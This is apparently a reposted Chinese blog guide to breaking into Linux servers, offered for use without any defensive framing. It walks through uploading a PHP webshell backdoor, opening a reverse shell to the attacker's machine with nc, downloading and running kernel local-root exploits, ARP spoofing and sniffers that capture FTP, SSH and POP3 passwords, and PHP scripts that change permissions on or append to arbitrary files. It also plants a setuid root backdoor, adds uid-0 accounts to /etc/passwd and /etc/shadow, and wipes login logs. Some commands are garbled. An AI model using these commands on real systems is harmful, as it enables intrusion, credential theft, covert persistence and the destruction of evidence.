歡迎光臨
每天分享高質量文章

想要如何入侵Linux伺服器?這幾個命令夠用了

來源:網路內容整理

寫個php一句話後門上去:

[jobcruit@wa64-054 rankup_log]$ echo -e “” >rankuplog_time.php

[jobcruit@wa64-054 rankup_log]$ cat rankuplog_time.php

1、linux的想著先跨站。

shell瀏覽標的站不行,命令列下輸入ls -la /www.users/

2、上限溢位提權

# python –c ‘impotr pty;pty.spawn(“/bin/sh”);

來得到互動的Shell,一般的系統都預設安裝python

 

輸入id
bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$
這裡uid=529(zeicom)還不是root許可權,
輸入uname –r
傳回:2.6.18-164.11.1.el5PAE

Linux提權大致可分為,第三方軟體漏洞、本地信任特性、核心上限溢位

找對應的exp, 這裡地址整理很齊全可以這裡下

  • http://tools.90sec.org/

  • http://sebug.net/paper/linux_exp/

  • http://x73.cc/bitch/exp/

  • http://www.exploit-db.com/search/

命令輸入pwd,這個命令是顯示當前目錄,

先看能不能編譯  gcc -help

當前目錄就是shell的目錄,我在shell上傳2.c

反彈shell  到外網自己機器的12345埠  

上外網伺服器 本地監聽 nc -lvvp 12345

一般都能得到一個apache互動的shell 有時候又不行

這時候  

 

# python -c 'impotr pty;pty.spawn("/bin/sh");' 
cd /tmp        進入tmp目錄 
mkdir Papers   建立一個Papers的目錄 Papers不顯眼
cd Papers      進入 Papers目錄
pwd            檢視當前目錄   
然後命令輸入
wget 下載exp
gcc –o 2 2.c  //把2.c編譯成可執行檔案 g++ keio.cc -o keio
chmod +x 2     //給2有執行許可權
./2            //執行2,  上限溢位
gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

 

確定arpsniffer.c需要先裝pcap和 libnet。

 

rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big;_mirror=0
tar zxvf libpcap-0.8.1.tar.gz
cd libpcap-0.8.1
./configure
make
make install

 

重新編譯arpsniffer.c

 

gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

 

這次沒報錯,編譯成功。

 

./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254

 

下麵開始欺騙,由於是伺服器端,因此我們欺騙閘道器:(網路環境如下,郵件伺服器ip:192.168.0.11 閘道器:192.168.0.1 本機:192.168.0.77)

 

 ./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

 

在另一個登入裡面用tcpdump監聽下

 

 tcpdump -i eth0 host 192.168.0.11

 

發現有資料,把監聽的資料存在檔案裡面:

 

 tcpdump -i eth0 host 172.16.0.12 -w pop.txt

 

10分鐘後停止,在SecureCRT下用sz命令下載pop.txt到本地,然後用Ethereal分析。

下麵我們就可以用linsniffer監聽我們想要的使用者名稱和密碼了。

 

先修改linsniffer.c:根據自己的需求監聽相應的應用密碼。我的如下:

if(ntohs(tcp->dest)==21)  p=1/* ftp */
if(ntohs(tcp->dest)==22)  p=1/* ssh for comparison added for example only comment out if desired*/
if(ntohs(tcp->dest)==23)  p=1/* telnet */
if(ntohs(tcp->dest)==80) p=1;  /* http */
if(ntohs(tcp->dest)==110) p=1/* pop3 */
if(ntohs(tcp->dest)==513) p=1/* rlogin */
if(ntohs(tcp->dest)==106) p=1/* poppasswd */
[root@bbs111 root]# gcc -o linsniffer linsniffer.c
In file included from /usr/include/linux/tcp.h:21,
from linsniffer.c:32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel essay-header; include  instead!

不用管警告,直接執行編譯後的linsniffer即可。

[root@bbs111 root]# ./linsniffer

使用者名稱和密碼都自動存到了tcp.log下。

3、利用跨站程式碼

linux不提權跨目錄訪問的程式碼 

linux許可權多設的比較松的其實,但有的虛擬機器還是不能跨目錄訪問的。

在提不了權的情況下,試試如下程式碼吧。運氣好的話說不定就跨過去了。

 

程式碼如下:

$path = stripslashes($_GET['path']);
$ok = chmod ($path , 0777);
if ($ok == true)
echo CHMOD OK , Permission editable file or directory. Permission to write;
?> 

 

把上面程式碼儲存為tmdsb.PHP

然後訪問http://www.tmdsb.com/tmdsb.php?path=../../要跨的目錄/index.php

這裡的index.PHP是要修改許可權的檔案。

收集的另一個exp:

把下麵的程式碼儲存為exp.PHP

程式碼:

@$filename = stripslashes($_POST['filename']);
@$mess = stripslashes($_POST['mess']);
$fp = @fopen({$_POST['filename']}, 'a');
@fputs($fp,$mess 
);
@fclose($fp);
?>

4.2.618最終Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)這個0day上限溢位成功

udev提權

換了個udev提權,適用於核心範圍為2.6.*。

還是上傳檔案至伺服器shell所在目錄,執行命令ls,發現檔案已經躺在那裡面了,之後賦予exp執行許可權。

chmod +x pwnkernel.c
chmod +x wunderbar_emporium.sh
chmod +x exploit.c
之後執行上限溢位./w*

成功上限溢位,root許可權。

之後就是留下一個後門~ 新增一個root許可權使用者俺也不介意。。。(useradd -u 0 -o “username”)

依次輸入命令

cd /tmp
sh-3.1# ls /lib/ld-linux*
/lib/ld-linux.so.2
sh-3.1# cp /lib/ld-linux.so.2 /tmp/.str1ven
sh-3.1# ls -l .str1ven
-rwxr-xr-x 1 root root 121684 07-08 21:13 .str1ven
sh-3.1# chmod +s .str1ven
sh-3.1# ls -l .str1ven
-rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven

 

成功建立一個後門,退出root,執行./.str1ven `which whoami`,又成功獲取root許可權~~ 

cat /etc/passwd 檢視linux使用者

cat /etc/shadow 檢視使用者密碼需要root許可權

cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表網絡卡號 檢視所在網絡卡的ip資訊

ifconfig 檢視本機ip資訊

cat /etc/resolv.conf 檢視DNS資訊

bash -i 在反彈的shell中使用可以直觀顯示命令

bash prompt: 當你以普通限權使用者身份進入的時候,一般你會有一個類似bash$的prompt。當你以

Root登陸時,你的prompt會變成bash#。

系統變數 : 試著echo “$USER / $EUID” 系統應該會告訴你它認為你是什麼使用者。

echo 1>/proc/sys/net/ipv4/if_forward是不是你寫錯了,應該是echo 1>/proc/sys/net/ipv4/ip_forward,

vim /proc/sys/net/ipv4/ip_forward 吧,預設是0,也就是核心不進行資料包過濾,改為1 ,讓核心對資料包進行filter處理!

netstat -an |grep LISTEN |grep :80 檢視埠

service –status-all | grep running

service –status-all | grep http

檢視執行服務

lsb_release -a 檢視系統版本

重啟ssh服務 :

/usr/sbin/sshd stop/

usr/sbin/sshd start

ssd_config檔案裡

PasswordAuthentication no,

將其改為

Pas

 

rdAuthentication yes

遠端ssh才可登入

否則顯示Access denied

其中Usepam yes可能用來建立pam方式login,比如從其它linux主機ssh到服務端,如果關閉,則不能開啟.

su的菜鳥用法

先chomod 777 /etc/passwd

然後修改bin使用者的gid和uid為0

然後passwd設定bin的密碼

然後cp /bin/bash /sbin/nologin

然後su的時候su – bin就可以到rootshell了。

 

這個原理就是當ssh不允許root用ssh終端登陸的時候,我們又不知道root密碼的一種很菜鳥的做法。

還可以這樣

sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c –o local –static –Wall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

 

清空last記錄 cp /dev/null /var/log/wtmp

—–

dd if=/dev/zero of=yourfile bs=10M count=10 建立一個100m的大檔案在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提權的時候要用到的

/etc/init.d/ssh start    開22埠

/etc/ssh/sshd_config SSH服務配置檔案

    贊(0)

    分享創造快樂